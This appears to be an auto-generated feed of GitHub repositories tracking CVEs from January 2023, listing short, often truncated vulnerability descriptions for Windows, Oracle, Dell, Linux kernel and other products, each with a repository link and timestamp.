**OS Command Injection vulnerability in OKER G955V1 v1.03.02.20161128, allows physical attackers to interrupt the boot sequence and execute arbitrary commands with root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22007](https://github.com/Live-Hack-CVE/CVE-2020-22007) create time: 2023-01-18T16:17:18Z

**DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36630](https://github.com/Live-Hack-CVE/CVE-2021-36630) create time: 2023-01-18T16:17:22Z

**Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33959](https://github.com/Live-Hack-CVE/CVE-2021-33959) create time: 2023-01-18T16:17:03Z

**A Improper Privilege Management vulnerability in SUSE Rancher allows write access to the Catalog for any user when restricted-admin role is enabled. This issue affects: SUSE Rancher Rancher versions prior to 2.5.13; Rancher versions prior to 2.6.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4200](https://github.com/Live-Hack-CVE/CVE-2021-4200) create time: 2023-01-18T16:16:35Z

**BlogEngine.NET v3.3.8.0 allows an attacker to create any folder with "files" prefix under ~/App_Data/. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41417](https://github.com/Live-Hack-CVE/CVE-2022-41417) create time: 2023-01-18T16:17:08Z

**In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30332](https://github.com/Live-Hack-CVE/CVE-2022-30332) create time: 2023-01-18T16:16:54Z

**A Improper Privilege Management vulnerability in the sudoers configuration in cscreen of openSUSE Factory allows any local users to gain the privileges of the tty and dialout groups and access and manipulate any running cscreen seesion. This issue affects: openSUSE Factory cscreen version 1.2-1.3 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21946](https://github.com/Live-Hack-CVE/CVE-2022-21946) create time: 2023-01-18T16:16:45Z

**An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a user-controlled parameter that is used to create an SQL query. It causes this service to be prone to SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45165](https://github.com/Live-Hack-CVE/CVE-2022-45165) create time: 2023-01-18T16:16:40Z

**Microsoft Exchange Server Spoofing Vulnerability. This CVE ID is unique from CVE-2023-21762. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21745](https://github.com/Live-Hack-CVE/CVE-2023-21745) create time: 2023-01-18T16:17:13Z

**Event Tracing for Windows Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21536. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21753](https://github.com/Live-Hack-CVE/CVE-2023-21753) create time: 2023-01-18T16:16:58Z

**Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21771](https://github.com/Live-Hack-CVE/CVE-2023-21771) create time: 2023-01-18T16:16:49Z

**Microsoft ODBC Driver Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21732](https://github.com/Live-Hack-CVE/CVE-2023-21732) create time: 2023-01-18T16:16:30Z

**Windows Bind Filter Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21733](https://github.com/Live-Hack-CVE/CVE-2023-21733) create time: 2023-01-18T16:16:26Z

**Windows Netlogon Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21728](https://github.com/Live-Hack-CVE/CVE-2023-21728) create time: 2023-01-18T16:16:21Z

**Dell command configuration, version 4.8 and prior, contains improper folder permission when installed not to default path but to non-secured path which leads to privilege escalation. This is critical severity vulnerability as it allows non-admin to modify the files inside installed directory and able to make applicatio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34457](https://github.com/Live-Hack-CVE/CVE-2022-34457) create time: 2023-01-18T14:02:46Z

**Dell iDRAC8 version 2.83.83.83 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34436](https://github.com/Live-Hack-CVE/CVE-2022-34436) create time: 2023-01-18T14:02:41Z

**Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34435](https://github.com/Live-Hack-CVE/CVE-2022-34435) create time: 2023-01-18T14:02:37Z

**Dell Alienware m17 R5 BIOS version prior to 1.2.2 contain a buffer access vulnerability. A malicious user with admin privileges could potentially exploit this vulnerability by sending input larger than expected in order to leak certain sections of SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34399](https://github.com/Live-Hack-CVE/CVE-2022-34399) create time: 2023-01-18T14:02:32Z

**A cross-site scripting vulnerability in Skyhigh SWG in main releases 11.x prior to 11.2.6, 10.x prior to 10.2.17, and controlled release 12.x prior to 12.0.1 allows a remote attacker to craft SWG-specific internal requests with URL paths to any third-party website, causing arbitrary content to be injected into the resp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0214](https://github.com/Live-Hack-CVE/CVE-2023-0214) create time: 2023-01-18T14:02:51Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in lierdakil click-reminder. It has been rated as critical. This issue affects the function db_query of the file src/backend/include/BaseAction.php. The manipulation leads to sql injection. The name of the patch is 41213b660e8eb01 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10007](https://github.com/Live-Hack-CVE/CVE-2010-10007) create time: 2023-01-18T11:52:08Z

**A vulnerability classified as critical was found in danynab movify-j. This vulnerability affects the function getByMovieId of the file app/business/impl/ReviewServiceImpl.java. The manipulation of the argument movieId/username leads to sql injection. The name of the patch is c3085e01936a4d7eff1eda3093f25d56cc4d2ec5. It CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10068](https://github.com/Live-Hack-CVE/CVE-2015-10068) create time: 2023-01-18T11:51:46Z

**A vulnerability classified as problematic has been found in GENI Portal. This affects the function no_invocation_id_error of the file portal/www/portal/sliceresource.php. The manipulation of the argument invocation_id/invocation_user leads to cross site scripting. It is possible to initiate the attack remotely. The nam CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36654](https://github.com/Live-Hack-CVE/CVE-2020-36654) create time: 2023-01-18T11:51:54Z

**A vulnerability was found in GENI Portal. It has been rated as problematic. Affected by this issue is some unknown functionality of the file portal/www/portal/error-text.php. The manipulation of the argument error leads to cross site scripting. The attack may be launched remotely. The name of the patch is c2356cc412605 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36653](https://github.com/Live-Hack-CVE/CVE-2020-36653) create time: 2023-01-18T11:51:50Z

**Prior Dell BIOS versions contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34460](https://github.com/Live-Hack-CVE/CVE-2022-34460) create time: 2023-01-18T11:52:29Z

**Dell EMC Metro node, Version(s) prior to 7.1, contain a Code Injection Vulnerability. An authenticated nonprivileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34456](https://github.com/Live-Hack-CVE/CVE-2022-34456) create time: 2023-01-18T11:52:25Z

**Dell BIOS contains a stack based buffer overflow vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to send larger than expected input to a parameter in order to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34401](https://github.com/Live-Hack-CVE/CVE-2022-34401) create time: 2023-01-18T11:52:21Z

**Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34393](https://github.com/Live-Hack-CVE/CVE-2022-34393) create time: 2023-01-18T11:52:17Z

**Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32490](https://github.com/Live-Hack-CVE/CVE-2022-32490) create time: 2023-01-18T11:52:12Z

**Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a Hard-coded Password Vulnerability. An attacker, with the knowledge of the hard-coded credentials, could potentially exploit this vulnerability to login to the system to gain admin privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34462](https://github.com/Live-Hack-CVE/CVE-2022-34462) create time: 2023-01-18T11:52:03Z

**Dell EMC SCG Policy Manager, versions from 5.10 to 5.12, contain(s) a contain a Hard-coded Cryptographic Key vulnerability. An attacker with the knowledge of the hard-coded sensitive information, could potentially exploit this vulnerability to login to the system to gain LDAP user privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34442](https://github.com/Live-Hack-CVE/CVE-2022-34442) create time: 2023-01-18T11:51:59Z

**A NULL pointer dereference vulnerability in the Linux kernel NVMe functionality, in nvmet_setup_auth(), allows an attacker to perform a Pre-Auth Denial of Service (DoS) attack on a remote machine. Affected versions v6.0-rc1 to v6.0-rc3, fixed in v6.0-rc4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0122](https://github.com/Live-Hack-CVE/CVE-2023-0122) create time: 2023-01-18T11:51:42Z

**no description** : [jfrog/git-crasher-poc-cve-2022-23521](https://github.com/jfrog/git-crasher-poc-cve-2022-23521) create time: 2023-01-18T10:27:34Z

**no description** : [lanqingaa/CVE-2022-46463](https://github.com/lanqingaa/CVE-2022-46463) create time: 2023-01-18T07:34:58Z

**A vulnerability was found in oznetmaster SSharpSmartThreadPool. It has been classified as problematic. This affects an unknown part of the file SSharpSmartThreadPool/SmartThreadPool.cs. The manipulation leads to race condition within a thread. The name of the patch is 0e58073c831093aad75e077962e9fb55cad0dc5f. It is rec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10067](https://github.com/Live-Hack-CVE/CVE-2015-10067) create time: 2023-01-18T06:22:34Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not properly validate the input module name to the backup services of the software. This could allow a remote attacker to access sensitive functions of the application and execute arbitrary system commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47911](https://github.com/Live-Hack-CVE/CVE-2022-47911) create time: 2023-01-18T06:23:03Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site request forgery in its monitor services. An attacker could take advantage of this vulnerability to execute arbitrary maintenance operations and cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47395](https://github.com/Live-Hack-CVE/CVE-2022-47395) create time: 2023-01-18T06:22:59Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site scripting in its backup services. An attacker could take advantage of this vulnerability to execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46733](https://github.com/Live-Hack-CVE/CVE-2022-46733) create time: 2023-01-18T06:22:55Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 contains hard-coded passwords for select users in the application’s database. This could allow a remote attacker to login to the database with unrestricted access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45444](https://github.com/Live-Hack-CVE/CVE-2022-45444) create time: 2023-01-18T06:22:50Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site request forgery in its backup services. An attacker could take advantage of this vulnerability to execute arbitrary backup operations and cause a denial-of-service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45127](https://github.com/Live-Hack-CVE/CVE-2022-45127) create time: 2023-01-18T06:22:46Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not properly validate the input module name to the monitor services of the software. This could allow a remote attacker to access sensitive functions of the application and execute arbitrary system commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43483](https://github.com/Live-Hack-CVE/CVE-2022-43483) create time: 2023-01-18T06:22:43Z

**Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not validate the length of RTLS report payloads during communication. This allows an attacker to send an exceedingly long payload, resulting in an out-of-bounds write to cause a denial-of-service condition or code execu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41989](https://github.com/Live-Hack-CVE/CVE-2022-41989) create time: 2023-01-18T06:22:38Z

**Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function, which uses an insecure regular expression. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25901](https://github.com/Live-Hack-CVE/CVE-2022-25901) create time: 2023-01-18T06:21:28Z

**Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21543, CVE-2023-21546, CVE-2023-21555, CVE-2023-21556. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21679](https://github.com/Live-Hack-CVE/CVE-2023-21679) create time: 2023-01-18T06:22:30Z

**Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21760, CVE-2023-21765. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21678](https://github.com/Live-Hack-CVE/CVE-2023-21678) create time: 2023-01-18T06:22:26Z

**Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21683, CVE-2023-21758. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21677](https://github.com/Live-Hack-CVE/CVE-2023-21677) create time: 2023-01-18T06:22:22Z

**Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21676](https://github.com/Live-Hack-CVE/CVE-2023-21676) create time: 2023-01-18T06:22:18Z

**Use After Free in GitHub repository gpac/gpac prior to 2.3.0-DEV. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0358](https://github.com/Live-Hack-CVE/CVE-2023-0358) create time: 2023-01-18T06:22:14Z

**BitLocker Security Feature Bypass Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21563](https://github.com/Live-Hack-CVE/CVE-2023-21563) create time: 2023-01-18T06:22:10Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21675](https://github.com/Live-Hack-CVE/CVE-2023-21675) create time: 2023-01-18T06:22:06Z

**Microsoft Cryptographic Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21551, CVE-2023-21561. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21730](https://github.com/Live-Hack-CVE/CVE-2023-21730) create time: 2023-01-18T06:22:02Z

**Windows Boot Manager Security Feature Bypass Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21560](https://github.com/Live-Hack-CVE/CVE-2023-21560) create time: 2023-01-18T06:21:58Z

**Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21674](https://github.com/Live-Hack-CVE/CVE-2023-21674) create time: 2023-01-18T06:21:54Z

**Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21735. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21734](https://github.com/Live-Hack-CVE/CVE-2023-21734) create time: 2023-01-18T06:21:50Z

**Microsoft Office Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21734. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21735](https://github.com/Live-Hack-CVE/CVE-2023-21735) create time: 2023-01-18T06:21:46Z

**Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21744. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21742](https://github.com/Live-Hack-CVE/CVE-2023-21742) create time: 2023-01-18T06:21:42Z

**Microsoft SharePoint Server Security Feature Bypass Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21743](https://github.com/Live-Hack-CVE/CVE-2023-21743) create time: 2023-01-18T06:21:38Z

**Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21742. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21744](https://github.com/Live-Hack-CVE/CVE-2023-21744) create time: 2023-01-18T06:21:34Z

**A vulnerability, which was classified as problematic, was found in michaelliao jopenid. Affected is the function getAuthentication of the file JOpenId/src/org/expressme/openid/OpenIdManager.java. The manipulation leads to observable timing discrepancy. Upgrading to version 1.08 is able to address this issue. The name o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10006](https://github.com/Live-Hack-CVE/CVE-2010-10006) create time: 2023-01-18T01:52:58Z

**An unauthorized user could alter or write files with full control over the path and content of the file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46660](https://github.com/Live-Hack-CVE/CVE-2022-46660) create time: 2023-01-18T01:53:31Z

**Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39429](https://github.com/Live-Hack-CVE/CVE-2022-39429) create time: 2023-01-18T01:53:23Z

**Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Visual Analyzer). Supported versions that are affected are 5.9.0.0.0 and 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Bus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21891](https://github.com/Live-Hack-CVE/CVE-2023-21891) create time: 2023-01-18T01:54:23Z

**Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Security). Supported versions that are affected are 5.9.0.0.0, 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise Oracle BI Publisher CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21846](https://github.com/Live-Hack-CVE/CVE-2023-21846) create time: 2023-01-18T01:54:18Z

**Vulnerability in the Oracle Mobile Field Service product of Oracle E-Business Suite (component: Synchronization). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Mobile Field Service. Successful CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21853](https://github.com/Live-Hack-CVE/CVE-2023-21853) create time: 2023-01-18T01:54:15Z

**Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Manageme CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21850](https://github.com/Live-Hack-CVE/CVE-2023-21850) create time: 2023-01-18T01:54:11Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Su CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21841](https://github.com/Live-Hack-CVE/CVE-2023-21841) create time: 2023-01-18T01:54:07Z

**Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21849](https://github.com/Live-Hack-CVE/CVE-2023-21849) create time: 2023-01-18T01:54:02Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Su CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21839](https://github.com/Live-Hack-CVE/CVE-2023-21839) create time: 2023-01-18T01:53:58Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Sound). Supported versions that are affected are Oracle Java SE: 8u351, 8u351-perf, 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Difficult to exploit vulnerability all CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21843](https://github.com/Live-Hack-CVE/CVE-2023-21843) create time: 2023-01-18T01:53:54Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21864](https://github.com/Live-Hack-CVE/CVE-2023-21864) create time: 2023-01-18T01:53:50Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21837](https://github.com/Live-Hack-CVE/CVE-2023-21837) create time: 2023-01-18T01:53:46Z

**Vulnerability in the Oracle Database RDBMS Security component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Oracle Database RDBMS Security CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21829](https://github.com/Live-Hack-CVE/CVE-2023-21829) create time: 2023-01-18T01:53:43Z

**Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.40 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21840](https://github.com/Live-Hack-CVE/CVE-2023-21840) create time: 2023-01-18T01:53:39Z

**Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Download). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Web Applications Desktop I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21847](https://github.com/Live-Hack-CVE/CVE-2023-21847) create time: 2023-01-18T01:53:35Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 11.0.17, 17.0.5, 19.0.1; Oracle GraalVM Enterprise Edition: 20.3.8, 21.3.4 and 22.3.0. Easily exploitable vulnerability allows unauthenticated at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21835](https://github.com/Live-Hack-CVE/CVE-2023-21835) create time: 2023-01-18T01:53:27Z

**Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Security). Supported versions that are affected are 5.9.0.0.0, 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise Oracle BI Publisher CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21832](https://github.com/Live-Hack-CVE/CVE-2023-21832) create time: 2023-01-18T01:53:18Z

**Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 8u351, 8u351-perf; Oracle GraalVM Enterprise Edition: 20.3.8 and 21.3.4. Easily exploitable vulnerability allows unauthenticated attacke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21830](https://github.com/Live-Hack-CVE/CVE-2023-21830) create time: 2023-01-18T01:53:13Z

**Vulnerability in the Oracle Database Data Redaction component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Oracle Database Data Redaction CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21827](https://github.com/Live-Hack-CVE/CVE-2023-21827) create time: 2023-01-18T01:53:08Z

**Vulnerability in the Oracle iSupplier Portal product of Oracle E-Business Suite (component: Supplier Management). Supported versions that are affected are 12.2.6-12.2.8. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iSupplier Portal. Successful atta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21825](https://github.com/Live-Hack-CVE/CVE-2023-21825) create time: 2023-01-18T01:53:03Z

**The sock_setsockopt function in net/core/sock.c in the Linux kernel before 3.5 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6704](https://github.com/Live-Hack-CVE/CVE-2012-6704) create time: 2023-01-17T23:40:07Z

**Integer overflow in the snd_compr_allocate_buffer function in sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel before 3.6-rc6-next-20120917 allows local users to cause a denial of service (insufficient memory allocation) or possibly have unspecified other impact via a crafted SNDRV_COMPRESS_SET_P CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6703](https://github.com/Live-Hack-CVE/CVE-2012-6703) create time: 2023-01-17T23:40:03Z

**Integer overflow in fs/aio.c in the Linux kernel before 3.4.1 allows local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6701](https://github.com/Live-Hack-CVE/CVE-2012-6701) create time: 2023-01-17T23:39:58Z

**Heap-based buffer overflow in the udf_load_logicalvol function in fs/udf/super.c in the Linux kernel before 3.4.5 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted UDF filesystem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3400](https://github.com/Live-Hack-CVE/CVE-2012-3400) create time: 2023-01-17T23:39:54Z

**The tcp_rcv_state_process function in net/ipv4/tcp_input.c in the Linux kernel before 3.2.24 allows remote attackers to cause a denial of service (kernel resource consumption) via a flood of SYN+FIN TCP packets, a different vulnerability than CVE-2012-2663. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6638](https://github.com/Live-Hack-CVE/CVE-2012-6638) create time: 2023-01-17T23:39:49Z

**net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via an auth_reply message that triggers an attempted build_request operation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1059](https://github.com/Live-Hack-CVE/CVE-2013-1059) create time: 2023-01-17T23:40:16Z

**Off-by-one error in the build_unc_path_to_root function in fs/cifs/connect.c in the Linux kernel before 3.9.6 allows remote attackers to cause a denial of service (memory corruption and system crash) via a DFS share mount operation that triggers use of an unexpected DFS referral name length. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4247](https://github.com/Live-Hack-CVE/CVE-2013-4247) create time: 2023-01-17T23:40:12Z

**Race condition in the ip4_datagram_release_cb function in net/ipv4/datagram.c in the Linux kernel before 3.15.2 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging incorrect expectations about locking during multithreaded access to internal data structures for IPv4 UDP sock CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9914](https://github.com/Live-Hack-CVE/CVE-2014-9914) create time: 2023-01-17T23:40:42Z

**The snd_compress_check_input function in sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel before 3.17 does not properly check for an integer overflow, which allows local users to cause a denial of service (insufficient memory allocation) or possibly have unspecified other impact via a crafted SND CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9904](https://github.com/Live-Hack-CVE/CVE-2014-9904) create time: 2023-01-17T23:40:28Z

